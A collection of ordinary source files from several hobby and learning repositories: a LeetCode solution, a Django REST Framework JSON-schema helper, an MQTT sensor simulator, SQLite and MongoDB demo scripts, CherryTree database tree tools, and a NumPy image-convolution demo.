def count_squares(matrix):
# dp to store the maximum no. of squares possible at that place
dp = [[0 for i in range(len(matrix[0]))] for j in range(len(matrix))]
# ans stores the total no. of squares formed.
ans = 0
# Looping through each cell of the given matrix.
for i in range(len(matrix)):
for j in range(len(matrix[0])):
# Corner cases as only square of dimensions [1*1] can be formed at 0th row and 0th column.
if i == 0 or j == 0:
dp[i][j] = matrix[i][j]
else:
if matrix[i][j] == 0:
dp[i][j] = 0
else:
# Taking minimum of the left surrounding and adding one (for [1*1] square formed).
dp[i][j] = min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1]) + 1
# updating our answer.
ans += dp[i][j]
return ans
# This code is contributed by <NAME>.
# Example :
matrix = [
[0, 1, 1, 1],
[1, 1, 1, 1],
[0, 1, 1, 1]
]
print(count_squares(matrix))
```
#### File: LeetCode-Solutions/Python/longestMountatinSubarray..py
```python
def longest_mountain_subarray(a):
max_len = 0
for i in range(1, len(a) - 1):
# Finding peak.
if a[i] > a[i + 1] and a[i] > a[i - 1]:
# pointer which will move to the left.
l = i
# pointer which will move to right.
r = i
while l > 0 and a[l] > a[l - 1]:
l -= 1
while r < len(a) - 1 and a[r] > a[r + 1]:
r += 1
# calculating max length.
max_len = max(max_len, (r - l) + 1)
return max_len
# Example test case.
a = [2, 1, 4, 7, 3, 2, 5]
print(longest_mountain_subarray(a))
``` |
{
"source": "joshdrake/django-rest-framework-json-schema",
"score": 2
} |
#### File: django-rest-framework-json-schema/rest_framework_json_schema/metadata.py
```python
from collections import OrderedDict
from django.utils.text import force_text
from rest_framework import metadata, serializers
from rest_framework.utils.field_mapping import ClassLookupDict
from .serializers import ModelClassSerializer
class JSONSchemaMetadataMixin(object):
label_lookup = ClassLookupDict({
serializers.Field: 'object',
serializers.BooleanField: 'boolean',
serializers.CharField: 'string',
serializers.URLField: 'string',
serializers.EmailField: 'string',
serializers.RegexField: 'string',
serializers.SlugField: 'string',
serializers.IntegerField: 'integer',
serializers.FloatField: 'number',
serializers.DecimalField: 'number',
serializers.DateField: 'string',
serializers.DateTimeField: 'string',
serializers.ChoiceField: 'enum',
serializers.FileField: 'string',
serializers.PrimaryKeyRelatedField: 'integer',
serializers.SlugRelatedField: 'enum',
serializers.HyperlinkedRelatedField: 'string',
serializers.HyperlinkedIdentityField: 'string',
})
def __init__(self, *args, **kwargs):
super(JSONSchemaMetadataMixin, self).__init__(*args, **kwargs)
def get_serializer_info(self, serializer):
opts = serializer.Meta.model._meta
schema = {
'rels': {},
'links': [],
'properties': OrderedDict(),
'required': [],
}
for field_name, field in serializer.fields.items():
if getattr(field, 'read_only', False):
continue
schema['properties'][field_name] = self.get_field_info(field)
if getattr(field, 'required', False):
schema['required'].append(field_name)
if isinstance(field, serializers.RelatedField):
field__name = field_name
link = {
'rel': field__name,
}
if isinstance(field, serializers.HyperlinkedRelatedField):
link['href'] = "{{{}}}".format(field_rel)
schema['links'].append(link)
schema['rels'][field_name] = ModelClassSerializer(field.queryset.model).data,
if isinstance(field, serializers.Serializer):
related_schema = self.get_serializer_info(field)
field_info = {
'type': 'object',
'properties': related_schema['properties'],
}
if isinstance(field, serializers.ListSerializer):
field_info = {
'items': field_info,
'type': 'array',
}
schema['properties'][field_name] = field_info
return schema
def get_field_info(self, field):
"""
Given an instance of a serializer field, return a dictionary
of metadata about it.
"""
field_info = OrderedDict()
field_info['type'] = self.label_lookup[field]
attribute_map = {
'label': 'title',
'help_text': 'description',
}
format_map = ClassLookupDict({
serializers.Field: None,
serializers.URLField: 'uri',
serializers.EmailField: 'email',
serializers.DateTimeField: 'date-time',
serializers.DateField: 'date-time',
serializers.FileField: 'file',
serializers.HyperlinkedRelatedField: 'uri',
serializers.HyperlinkedIdentityField: 'uri',
})
for attr in ['min_length', 'max_length', 'label', 'help_text']:
dest = attribute_map.get(attr, attr)
value = getattr(field, attr, None)
if value is not None and value != '':
field_info[dest] = force_text(value, strings_only=True)
format = format_map[field]
if format:
field_info['format'] = format
if hasattr(field, 'choices') and not isinstance(field, serializers.RelatedField):
field_info['enum'] = field.choices.keys()
field_info['choices'] = [
{'value': value, 'display_name': display_name}
for value, display_name in field.choices.iteritems()
]
if isinstance(field, serializers.RelatedField):
if isinstance(field, serializers.ListSerializer):
field_info['items'] = {'type': field_info['type']}
if 'format' in field_info:
field_info['items']['format'] = field_info.pop('format')
field_info['type'] = 'array'
return field_info
class JSONSchemaMetadata(JSONSchemaMetadataMixin, metadata.SimpleMetadata):
pass
``` |
{
"source": "joshdreagan/iot-demo",
"score": 2
} |
#### File: iot/pumpjack/sim.py
```python
import click
import json
import paho.mqtt.publish as publish
import random
import shutil
import time
from urllib.parse import urlparse
now = lambda: int(round(time.time() * 1000))
def __msg(topic, payload, qos=0, retain=False):
return { "topic": topic, "payload": payload, "qos": qos, "retain": retain }
def __payload(location_id, rig_id, time, type, data=None):
return { "locationId": location_id, "rigId": rig_id, "time": time, "source": "pumpjack", "type": type, "data": (data if data!=None else {}) }
def __heartbeat(location_id, rig_id, time):
data = None
return __payload(location_id, rig_id, time, "heartbeat", data)
def __tachometer(location_id, rig_id, time, speed, speed_variance):
data = { "rpm": random.uniform(max(0, speed - speed_variance), max(0, speed + speed_variance)) }
return __payload(location_id, rig_id, time, "tachometer", data)
def __piezo(location_id, rig_id, time, frequency, frequency_variance):
data = { "vibrationFrequency": random.uniform(max(0, frequency - frequency_variance), max(0, frequency + frequency_variance)) }
return __payload(location_id, rig_id, time, "piezo", data)
@click.command(context_settings={ "max_content_width": shutil.get_terminal_size()[0] })
@click.option("--location-id", help="The unique identifier for the location.")
@click.option("--rig-id", help="The unique identifier for the rig.")
@click.option("--broker-username", help="The username for the MQTT broker.")
@click.option("--broker-password", hide_input=True, prompt=True, confirmation_prompt=True, help="The password for the MQTT broker.")
@click.option("--telemetry-topic", default="iot.telemetry", show_default=True, help="The topic to send the telemetry data to.")
@click.option("--telemetry-frequency", type=click.IntRange(min=1, max=None), default=5, show_default=True, help="The frequency (in seconds) of the telemetry messages.")
@click.option("--buffer-timeout", type=click.IntRange(min=1000, max=None), default=10000, show_default=True, help="The time (in millis) to wait before sending each batch of messages to the MQTT broker.")
@click.option("--tachometer-enabled", is_flag=True, default=True, show_default=True, help="Whether or not to send tachometer sensor telemetry messages.")
@click.option("--tachometer-rotation-speed", type=click.FloatRange(min=0, max=None), default=12.0, show_default=True, help="The rotations per minute for the tachometer.")
@click.option("--tachometer-rotation-speed-variance", type=click.FloatRange(min=0, max=None), default=1.0, show_default=True, help="The variance of the rotations per minute for the tachometer.")
@click.option("--piezo-enabled", is_flag=True, default=True, show_default=True, help="Whether or not to send piezoo sensor telemetry messages.")
@click.option("--piezo-vibration-frequency", type=click.FloatRange(min=0.0, max=None), default=1000.0, show_default=True, help="The frequence (in Hz) of the vibrations for the piezo sensor.")
@click.option("--piezo-vibration-frequency-variance", type=click.FloatRange(min=0.0, max=None), default=1.0, show_default=True, help="The variance (in Hz) of the vibrations for the piezo sensor.")
@click.option("--verbose", is_flag=True, default=False, show_default=True, help="Enable verbose logging output")
@click.argument("broker_url", required=True)
def main(location_id, rig_id, broker_username, broker_password, telemetry_topic, telemetry_frequency, buffer_timeout, tachometer_enabled, tachometer_rotation_speed, tachometer_rotation_speed_variance, piezo_enabled, piezo_vibration_frequency, piezo_vibration_frequency_variance, verbose, broker_url):
broker_url_parts = urlparse(broker_url)
broker_auth = { "username": broker_username, "password": <PASSWORD> }
last_run = now()
msgs = list()
while True:
current_run = now()
if verbose:
click.echo("Woke up. Gathering telemetry data...")
click.echo("Last run: {}, Current Run: {}".format(last_run, current_run))
msg = __msg(telemetry_topic, json.dumps(__heartbeat(location_id, rig_id, current_run)))
if verbose:
click.echo(msg)
msgs.append(msg)
if tachometer_enabled:
msg = __msg(telemetry_topic, json.dumps(__tachometer(location_id, rig_id, current_run, tachometer_rotation_speed, tachometer_rotation_speed_variance)))
if verbose:
click.echo(msg)
msgs.append(msg)
if piezo_enabled:
msg = __msg(telemetry_topic, json.dumps(__piezo(location_id, rig_id, current_run, piezo_vibration_frequency, piezo_vibration_frequency_variance)))
if verbose:
click.echo(msg)
msgs.append(msg)
if current_run >= (last_run + buffer_timeout):
click.echo("Publishing {} messages to {}:{}...".format(len(msgs), broker_url_parts.hostname, broker_url_parts.port))
publish.multiple(msgs, hostname=broker_url_parts.hostname, port=broker_url_parts.port, auth=broker_auth, client_id="{}-{}".format(location_id, rig_id))
click.echo("Done.")
last_run = now()
msgs.clear()
time.sleep(telemetry_frequency)
if __name__ == "__main__":
main()
``` |
{
"source": "joshdsolis/DS-Unit-3-Sprint-1-Software-Engineering",
"score": 4
} |
#### File: joshdsolis/DS-Unit-3-Sprint-1-Software-Engineering/acme.py
```python
import random
class Product:
"""Class for Acme's Product"""
def __init__(self, name, price = 10, weight = 20, flammability = 0.5,
identifier = random.randint(1000000,9999999)):
self.name = name
self.price = price
self.weight = weight
self.flammability = flammability
self.identifier = identifier
def stealability(self):
ratio = self.price/float(self.weight)
if ratio < 0.5:
return "Not so stealable..."
elif ratio >= 0.5 and ratio < 1:
return "Kinda stealable."
else:
return "Very stealable!"
def explode(self):
final = self.flammability * self.weight
if final < 10:
return "...fizzle"
elif final >= 10 and final < 50:
return "...boom!"
else:
return "...BABOOM!!"
class BoxingGlove(Product):
def __init__(self, name, price = 10, weight = 10, flammability = 0.5,
identifier = random.randint(1000000,9999999)):
self.name = name
self.price = price
self.weight = weight
self.flammability = flammability
self.identifier = identifier
def explode(self):
return "...it's a glove"
def punch(self):
if self.weight < 5:
return "That tickles"
elif self.weight >= 5 and self.weight < 15:
return "Hey that hurt!"
else:
return "OUCH!"
``` |
{
"source": "joshdsolis/DS-Unit-3-Sprint-2-SQL-and-Databases",
"score": 4
} |
#### File: joshdsolis/DS-Unit-3-Sprint-2-SQL-and-Databases/demo_data.py
```python
import sqlite3
sl_conn = sqlite3.connect('../SQLandDatabases/demo_data.sqlite3')
create_table = """ CREATE TABLE demo (
s varchar(30),
x int,
y int
); """
sl_curs = sl_conn.cursor()
sl_curs.execute(create_table)
sl_curs.execute(""" INSERT INTO demo (
s, x, y) VALUES ("'g'", 3, 9)
;""")
sl_curs.execute(""" INSERT INTO demo (
s, x, y) VALUES ("'v'", 5, 7)
;""")
sl_curs.execute(""" INSERT INTO demo (
s, x, y) VALUES ("'f'", 8, 7)
;""")
sl_conn.commit()
rows_count_query = """SELECT COUNT(*)
FROM demo;"""
greater_than_5_query = """SELECT COUNT(*)
FROM demo
WHERE demo.x >= 5
AND demo.y >= 5;"""
unique_y_query = """SELECT COUNT(DISTINCT(demo.y))
FROM demo;"""
def query(x):
print(sl_curs.execute(x).fetchall())
```
#### File: DS-Unit-3-Sprint-2-SQL-and-Databases/module3-nosql-and-document-oriented-databases/rpg_to_mongo.py
```python
import sqlite3
import pymongo
# Get the data from sqlite3
sl_conn = sqlite3.connect('../joshdsolis/rpg_db.sqlite3')
results = sl_conn.execute('SELECT * FROM charactercreator_character;').fetchall()
# Data to dict form
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
sl_conn.row_factory = dict_factory
curs = sl_conn.cursor()
curs.execute
results = sl_conn.execute('SELECT * FROM charactercreator_character;').fetchall()
# Connecting to MongoDB
connection_string = "mongodb://UserJosh:<TODO>@cluster0-shard-00-00-5wkdx.mongodb.net:27017,cluster0-shard-00-01-5wkdx.mongodb.net:27017,cluster0-shard-00-02-5wkdx.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true"
client = pymongo.MongoClient(connection_string)
db = client.test
for result in results:
db.test.insert_one(result)
print(list(db.test.find()))
``` |
{
"source": "joshdsolis/lambdata",
"score": 3
} |
#### File: lambdata/lambdata_joshdsolis/lambdata_tests.py
```python
import unittest
import numpy as np
import pandas as pd
from __init__ import *
# testing __init__ functions
class LambTest(unittest.TestCase):
"""Test lambdata_joshdsolis functions"""
# def test_checknulls(self):
# df = pd.DataFrame(np.ones(100))
# self.assertEqual(check_nulls(df).tolist(), df.isna().sum()).tolist()
# Testing more_rows functions in init
def test_morerows(self):
df = pd.DataFrame(np.ones(100))
more_rows(df, 100)
self.assertEqual(df.shape, (200, 1))
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joshduf/DisinformationNetworks",
"score": 3
} |
#### File: joshduf/DisinformationNetworks/preProcess.py
```python
import csv
import numpy as np
import random
import re
# Non-ASCII values are ignored to ensure the model doesn't
# use artifacts from the encoding process to classify tweets
# as I have no control over the methods NBCNews used to create
# it's csv of positive examples.
# Only time and tweet text are used and are tagged
def getFile(file, MAX):
STWEET = "<SW>"
ETWEET = "<EW>"
SHOUR = "<SH>"
EHOUR = "<EH>"
STEXT = "<ST>"
ETEXT = "<ET>"
lines = []
with open(file, "r", encoding="utf-8") as f:
data = csv.reader(f)
for _, row in zip(range(MAX), data):
time = row[1].encode('ascii',errors='ignore').decode()
text = row[2].encode('ascii',errors='ignore').decode()
lines.append(STWEET + SHOUR + time + EHOUR + STEXT + text + ETEXT + ETWEET)
f.close()
return lines
# To be fed into a CNN, all examples are padded to the length of the
# longest example
def pad(data):
longest = len(max(data, key=len))
padded = [row.ljust(longest, ">") for row in data]
return padded
# Tweets are grouped together. This assumes they were organized by
# user first, then time. The dataset used had on average hundreds
# of tweets per user and the group size was <= 20 so the possibility
# of a group consisting of tweets from 2 different users don't
# significantly effect the outcome of classification and are ignored.
def combine(data, GROUPSIZE):
START = "<S>"
END = "<E>"
newData = []
for newRow in range(len(data)//GROUPSIZE):
combined = ""
for oldRow in range(newRow*GROUPSIZE, (newRow + 1)*GROUPSIZE):
combined += data[oldRow] + " "
combined = START + " " + combined + END
newData.append(combined)
return newData
# Takes positive and negative examples and creates input and output vectors
def readData(POSFILE, NEGFILE, NEGFILE2, MAXPOS, MAXNEG, MAXNEG2, GROUP):
pos = getFile(file=POSFILE, MAX=MAXPOS)
neg = getFile(file=NEGFILE, MAX=MAXNEG) + getFile(file=NEGFILE2, MAX=MAXNEG2)
pos = combine(pos, GROUP)
neg = combine(neg, GROUP)
y = [1 for line in pos] + [0 for line in neg]
x = pad(pos + neg)
return (x, y)
# Creates a dictionary mapping characters to an associated index
def getIndexes(x):
letters = set()
for line in x:
letters.update(line)
indexes = dict((letter, index) for index, letter in enumerate(letters))
return indexes
# Turns character vector into vector of character indexes
def vectorize(x, y, indexes):
Y = np.array(y)
X = [[indexes.get(letter, -1) for letter in line] for line in x]
return (X, Y)
# Splits data into test and train sections
def splitData(X, Y, SPLITSIZE):
x_train = np.array(X[:SPLITSIZE])
x_test = np.array(X[SPLITSIZE:])
y_train = np.array(Y[:SPLITSIZE])
y_test = np.array(Y[SPLITSIZE:])
return (x_train, y_train), (x_test, y_test)
``` |
{
"source": "joshdunnlime/better-python-string-sql",
"score": 4
} |
#### File: better-python-string-sql/docs/demo.py
```python
import sqlite3
DATASET = [
("Tencho", "2018-12-03"),
("Bessho", "2018-12-03"),
("Emoto", "2020-12-03"),
("Gamo", "2020-12-03"),
("Funakoshi", "2020-12-03"),
("Funakoshi", "2020-12-03"),
("Doigaki", "2020-12-03"),
("Doigaki", "2020-20-03"),
("Chikura", "2020-12-03"),
("Akabane", "2020-12-03"),
]
def main():
conn = sqlite3.connect(":memory:")
conn.executescript(
"""
DROP TABLE IF EXISTS foobar;
CREATE TABLE foobar (
last_name TEXT TEXT NOT NULL,
start_day TEXT NOT NULL
);
"""
)
conn.executemany("INSERT INTO foobar VALUES (?, ?)", DATASET)
query = """
SELECT last_name,
start_day,
COUNT(*) AS num_entries
FROM foobar
WHERE start_day >= '2019-01-01'
GROUP BY last_name, start_day
ORDER BY num_entries DESC
LIMIT 10;
"""
print(conn.execute(query).fetchall())
if __name__ == "__main__":
main()
``` |
{
"source": "joshedler/ct2ad",
"score": 4
} |
#### File: joshedler/ct2ad/ct2ad.py
```python
def sql_get_tables(con):
'''
Print the tables found in the SQLite database.
:param con: sqlite3 connection object
:return: returns nothing
'''
c = con.cursor()
c.execute('SELECT name from sqlite_master where type= "table"')
print('found tables:')
print(f' {c.fetchall()}')
def sql_get_all_nodes(con):
'''
Get all nodes from the CherryTree database.
:param con: sqlite3 connection object
:return: returns a dictionary, with keys being node_id and values being
the original tuple row from the database (node_id, name, txt)
'''
c = con.cursor()
c.execute('SELECT node_id, name, txt from node')
# 'rows' are of type list
# each 'row' is of type tuple
rows = c.fetchall()
print(f'loaded {len(rows)} total nodes...')
results = { }
for row in rows:
results[row[0]] = row
return results
def sql_get_all_children(con):
'''
Get all children from the CherryTree database.
:param con: sqlite3 connection object
:return: returns the children as a list of tuple(node_id, father_id, sequence)
'''
c = con.cursor()
c.execute('SELECT node_id, father_id, sequence from children')
# 'rows' are of type list
# each 'row' is of type tuple
rows = c.fetchall()
print(f'loaded {len(rows)} total children...')
return rows
def sql_get_child_by_node_id(con, node_id):
'''
Get the node with matching node_id from the CherryTree database.
:param con: sqlite3 connection object
:param node_id: the node_id to return
:return: returns a list of tuple rows from the database (node_id, name, txt)
'''
c = con.cursor()
a = (node_id,)
c.execute('SELECT node_id, father_id, sequence FROM children WHERE node_id = ?', a)
# 'rows' are of type list
# each 'row' is of type tuple
rows = c.fetchall()
return rows
def expand_child(child, all_nodes):
'''
Given a child tuple, return the matching node_id as a dictionary.
:param child: a child tuple(node_id, father_id, sequence)
:param all_nodes: the dictionary of all nodes from the database
:return: returns a node as a dictionary object with keys
'node' as tuple (node_id, name, txt),
'father' as tuple (node_id, name, txt), and
'seq' as integer
'''
node = all_nodes[child[0]]
father = all_nodes[child[1]] if child[1] > 0 else None
seq = child[2]
return {'node': node, 'father': father, 'seq': seq}
def get_father_for_node(node, all_children, all_nodes):
'''
Find the father for a given node.
:param node: the starting node for which the father is desired
:param all_children: the list of all children from the database
:param all_nodes: the dictionary of all nodes from the database
:return: returns the father node (node_id, name, txt) if there is one or None
'''
node_id = get_node_id(node)
for c in all_children:
if c[0] == node_id:
xc = expand_child(c, all_nodes)
return get_expanded_child_father(xc)
return None
def get_expanded_child_node(xc):
return xc['node']
def get_expanded_child_father(xc):
return xc['father']
def get_expanded_child_seq(xc):
return xc['seq']
def get_node_txt(node):
'''
Returns the txt field from a node tuple (node_id, name, txt)
:param node: a node tuple (node_id, name, txt)
:return: returns the string representing the txt field
'''
return node[2]
def get_node_name(node):
'''
Returns the name field from a node tuple (node_id, name, txt)
:param node: a node tuple (node_id, name, txt)
:return: returns the string representing the name field
'''
return node[1]
def get_node_id(node):
'''
Returns the node_id field from a node tuple (node_id, name, txt)
:param node: a node tuple (node_id, name, txt)
:return: returns the node_id field
'''
return node[0]
def dig(father, all_children, all_nodes, level):
'''
Given a father, recursively dig through the children, yielding(expanded_child_node, level) along the way.
:param father: a father as an "expanded child" dictionary node with keys 'node', 'father', and 'seq'
:param all_children: the list of all children from the database
:param all_nodes: the dictionary of all nodes from the database
:level: an integer, beginning with 1, representing the indent level for nice output
:return: returns nothing
'''
father_id = father['node'][0]
children = list(filter(lambda c: c[1] == father_id, all_children))
xc_list = []
for child in children:
xc = expand_child(child, all_nodes)
xc_list.append(xc)
for xc in sorted(xc_list, key=sequence_order):
yield(xc, level)
for xc_n, l in dig(xc, all_children, all_nodes, level+1):
yield(xc_n, l)
def sequence_order(expanded_child):
'''
A function allowing sorted() to iterate over a list of expanded_child dictionary objects in the proper sequence.
'''
return expanded_child['seq']
```
#### File: joshedler/ct2ad/tree.py
```python
import argparse
import colorama
from colorama import Fore, Back, Style
import sqlite3
from ct2ad import *
def print_xc_node(xc_node, level):
'''
Print the node information to the console in a nice format
'''
indent = '--' * level
s = get_expanded_child_seq(xc_node)
n = get_expanded_child_node(xc_node)
print(f'{Style.DIM}|{indent} {Style.NORMAL}{s:03}: {Style.BRIGHT+Fore.YELLOW}\'{get_node_name(n)}\' {Fore.RESET}{Style.DIM}: [node_id = {get_node_id(n)}]')
# setup argument parsing...
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('sqlite3_db', action='store')
args = parser.parse_args()
colorama.init(autoreset=True)
# load the database and party on!
con = sqlite3.connect(args.sqlite3_db)
sql_get_tables(con)
# all_nodes are a dict with each key being the unique node_id
all_nodes = sql_get_all_nodes(con)
# all_children are a list of tuples
all_children = sql_get_all_children(con)
xc_roots = []
for child in all_children:
xc_root = expand_child(child, all_nodes)
if get_expanded_child_father(xc_root) == None: xc_roots.append(xc_root)
print()
count = 0
for xc_root in sorted(xc_roots, key=sequence_order):
count = count + 1
print_xc_node(xc_root, 0)
for xc, level in dig(xc_root, all_children, all_nodes, 1):
print_xc_node(xc, level)
count = count + 1
print(f'\n{count} nodes iterated over')
``` |
{
"source": "JoshEHenderson/Convolution-Basics-Numpy",
"score": 4
} |
#### File: JoshEHenderson/Convolution-Basics-Numpy/Convolution_Basics.py
```python
import sys #system import
import numpy as np #for handling arrays
import matplotlib.pyplot as plt #for plotting images
import matplotlib.image as mpimg #for reading images
DIR = #Enter file location of image to be processed here
def pad(img, num): #adds layers of zeros so that filter can detect border features
w = img.shape[0] #image width
h = img.shape[1] #image height
output = np.zeros((w+num*2, h+num*2)) #output array, initialized to zeros
for r in range(h+2):
for c in range(w+2):
if r<num or c<num or r>h+num-1 or c>w+num-1:
output[c,r] = 0 #add a zero to the first num and last num rows/columns
else:
output[c,r] = img[c-num,r-num] #everything else is the same
return output
def ReLU(img): #helps with image output - turns negative numbers into zeros
w = img.shape[0] #image width
h = img.shape[1] #image height
output = np.zeros((w, h)) #output array, initialized to zeros
for r in range(h):
for c in range(w):
output[c,r]= max(img[c,r], 0) #max between current value and 0 (0>negative number)
return output
def maxPool(img, sz=2, str=2): #max pooling function for downsizing; sz = window size; str = stride
w = img.shape[0] #image width
h = img.shape[1] #image height
output = np.zeros((int((w-sz+1)/str), int((h-sz+1)/str))) #output array, initialized to zeros
if output.shape[0] < 1: #make sure we're not going to get rid of the image
print("image is not big enough to pool with given pool size and stride")
return img
outR = 0 #for keeping track of row on output
for r in np.arange(0, h-sz-1, str): #rows from 0 to h-sz-1 with increments of str
outC = 0 #for keeping track of column on output
for c in np.arange(0, w-sz-1, str): #columns from 0 to w-sz-1 with increments of str
output[outC, outR] = np.max(img[c:c+sz, r:r+sz]) #maximum from the current window
outC += 1
outR += 1
return output
def invertImg(img):
for r in range(img.shape[1]): #moving down the image
for c in range(img.shape[0]): #moving across the image
img[c,r] = 1-img[c,r] #swap the large and small values (all are in range [0-1])
return img
def convolution(img, filt, s=1): #convolution function (feature detection)
img = pad(img, int((filt.shape[1]-1)/2)) #pad the image with the above pad function
w = img.shape[0] #image width
h = img.shape[1] #image height
numFilts = filt.shape[0] #number of filters we are given
filtDim = filt.shape[1] #dimensions of the filters
output = np.zeros((w-int((filtDim-1)/2), h-int((filtDim-1)/2))) #output array init to zeros
#Prerequisites for the convolution function to work correctly
if(filt.shape[1] != filt.shape[2]): #filter width and height must be the same
print("Width and height of filter aren't equal")
sys.exit()
if(filtDim%2==0): #there is no center pixel in the filter if it does not have odd dimensions
print("Filter must have odd dimensions")
sys.exit()
for f in range(numFilts): #for each of the filters
currF = filt[f, :] #get the current filter
for r in range(h-filtDim-1): #move the filter vertically down the image
for c in range(w-filtDim-1): #move the filter horizontally across the image
output[c,r] = np.sum(img[c:c+filtDim, r:r+filtDim]*currF[:,:]) + output[c,r]
'''For the above line:
img[c:c+filtDim, r:r+filtDim]*currF[:,:] multiplies the current filter with
the image area and then np.sum sums up the resulting array.
Since there could be more than one filter, we add up the values from all
the filters to get the combined result.
'''
return output
def doConv(img, imgNum, filtMd, filtLg): #different iterations of the program
if(imgNum-1 in range(4)):
print("Using function number",imgNum)
else:
print("Function number not defined")
sys.exit()
if(imgNum == 1): #Image 1 Start
print("convolution layer 1")
for j in range(2): #2 convolutions with large filters
print("Large running")
img = convolution(img, filtLg)
for j in range(2): #2 convolutions with medium filters
print("Medium running")
img = convolution(img, filtMd)
print("Pooling")
img = maxPool(img) #Max pool
print("ReLU")
img = ReLU(img) #ReLU
print("convolution layer 2")
for j in range(2): #2 convolutions with large filters
print("Large running")
img = convolution(img, filtLg)
for j in range(2): #2 convolutions with medium filters
print("Medium running")
img = convolution(img, filtMd)
print("Single Convolution - Large")
img = convolution(img, filtLg) #1 convolution with large filters
print("Pooling")
img = maxPool(img) #Max pool
print("ReLU")
img = ReLU(img) #ReLU
#End Image 1
elif(imgNum == 2): #Image 2 Start
for i in range(3): #3x loop Start
print("convolution layer", i+1)
print("Large running")
img = convolution(img, filtLg) #1 convolution with large filters
print("Medium running")
img = convolution(img, filtMd) #1 convolution with medium filters
print("Pooling")
img = maxPool(img) #Max pool
#End 3x loop
for i in range(2): #2x loop Start
print("convolution layer", i+4)
print("Large running")
img = convolution(img, filtLg) #1 convolution with large filters
print("Medium running")
img = convolution(img, filtMd) #1 convolution with medium filters
print("Pooling")
img = maxPool(img) #Max pool
#End 2x Loop
#End Image 2
elif(imgNum == 3): #Image 3 Start
img = invertImg(img) #re-invert image because of the output of one layer
diagonals = np.zeros((2, 5, 5)) #new array for filters for diagonals
diagonals[0, :, :] = np.array([[[ 1, .25, -1, -1, -1],
[.25, 1, .25, -1, -1],
[ -1, .25, 1, .25, -1],
[ -1, -1, .25, 1, .25],
[ -1, -1, -1, .25, 1]]])
for y in range(5):
for x in range(5):
diagonals[1, x, y] = diagonals[0, y, 4-x]
print("Single Convolution - Large")
img = convolution(img, diagonals) #1 convolution with large filters
#End Image 3
elif(imgNum == 4): #Image 4 Start
for i in range(2): #2x Loop Start
print("convolution layer",i+1)
for j in range(2): #2 convolutions with large filters
print("Large running")
img = convolution(img, filtLg)
for j in range(2): #2 convolutions with medium filters
print("Medium running")
img = convolution(img, filtMd)
print("Pooling")
img = maxPool(img) #Max pool
#End 2x Loop
print("ReLU")
img = ReLU(img) #ReLU
print("convolution layer 3")
for j in range(2): #2 convolutions with large filters
print("Large running")
img = convolution(img, filtLg)
for j in range(2): #2 convolutions with medium filters
print("Medium running")
img = convolution(img, filtMd)
print("Pooling")
img = maxPool(img) #Max pool
print("Single Convolution - Large")
img = convolution(img, filtLg) #1 convolution with large filters
print("Pooling")
img = maxPool(img) #Max pool
print("ReLU")
img = ReLU(img) #ReLU
return img
def setFilt(size):
if(size == "Md"):
filt = np.zeros((4, 3, 3)) #array for the medium filters (straight lines)
filt[0, :,:] = np.array([[[ -1, .25, 1], #vertical line
[ -1, .25, 1],
[ -1, .25, 1]]])
filt[1,:,:] = np.array([[[ 1, 1, 1], #horizontal line
[.25, .25, .25],
[ -1, -1, -1]]])
filt[2,:,:] = np.array([[[ 1, .25, -1], #diagonal line (negative slope)
[.25, 1, .25],
[ -1, .25, 1]]])
filt[3,:,:] = np.array([[[ -1, .25, 1], #diagonal line (positive slope)
[.25, 1, .25],
[ 1, .25, -1]]])
elif(size == "Lg"):
filt = np.zeros((6, 5, 5)) #array for large filters (curves and long diagonals)
filt[0, :, :] = np.array([[[ 1, .25, -1, -1, -1], #long diagonal line (negative slope)
[.25, 1, .25, -1, -1],
[ -1, .25, 1, .25, -1],
[ -1, -1, .25, 1, .25],
[ -1, -1, -1, .25, 1]]])
for y in range(5):
for x in range(5):
filt[1, x, y] = filt[0, y, 4-x] #long diagonal line (positive slope)
filt[2, :, :] = np.array([[[ 1, 1, .25, .10, -1], #curve (from top, right then down)
[.25, .25, 1, .25, .10],
[.10, .10, .25, 1, .25],
[ -1, .05, .10, .25, 1],
[ -1, -1, .10, .25, 1]]])
for y in range(5):
for x in range(5):
filt[3, x, y] = filt[2, y, 4-x] #curve (from bottom, up then right)
for y in range(5):
for x in range(5):
filt[4, x, y] = filt[2, 4-y, x] #curve (from bottom, right then up)
for y in range(5):
for x in range(5):
filt[5, x, y] = filt[4, 4-y, x] #curve (from top, down then right)
else:
print("Filter Size not Defined")
sys.exit()
return filt
def comparisonPlot(img, n1, n2, n3, n4): #plots a side-by-side of four different outputs
fig, axarr = plt.subplots(2, 2) #2x2 array of images to be displayed
img1 = img2 = img3 = img4 = img #avoid interference between algorithms
axarr[0, 0].imshow(doConv(img1, n1, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 1
axarr[0, 0].set_title('Image 1') #label image 1
axarr[0, 1].imshow(doConv(img2, n2, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 2
axarr[0, 1].set_title('Image 2') #label image 2
axarr[1, 0].imshow(doConv(img3, n3, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 3
axarr[1, 0].set_title('Image 3') #label image 3
axarr[1, 1].imshow(doConv(img4, n4, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 4
axarr[1, 1].set_title('Image 4') #label image 4
fig.subplots_adjust(hspace=0.5) #adjust the space beteen the images
plt.show() #display the images
def main(): #master function to manage subfunctions above, read, and write
#read in the original image
originalImg = mpimg.imread(DIR)
plt.imshow(originalImg) #plots the original image
img = originalImg[:, :, 0] #gets one layer of the image since it is black and white
img = invertImg(img) #inverts image so black is large numbers and white is small numbers
img = doConv(img, 1, setFilt("Md"), setFilt("Lg")) #does the pre-defined functions
#currently in range [1,4]
plt.imshow(img, "gist_heat") #plots the feature-detection image with red filter
comparisonPlot(img, 1, 2, 3, 4) #side-by-side comparison of four images with red filter
main() #runs the main function
``` |
{
"source": "JoshEHenderson/SQL-ETL-Visualization",
"score": 3
} |
#### File: JoshEHenderson/SQL-ETL-Visualization/SQL_Data_Visualization.py
```python
import pandas as pd
import matplotlib.pyplot as plt
import datetime as dt
# roundMin is passed a date with type datetime
# roundMin returns the date rounded down to the minute (sets the value of date.second to 0)
def roundMin(date):
return dt.datetime(date.year, date.month, date.day, date.hour, date.minute, 0)
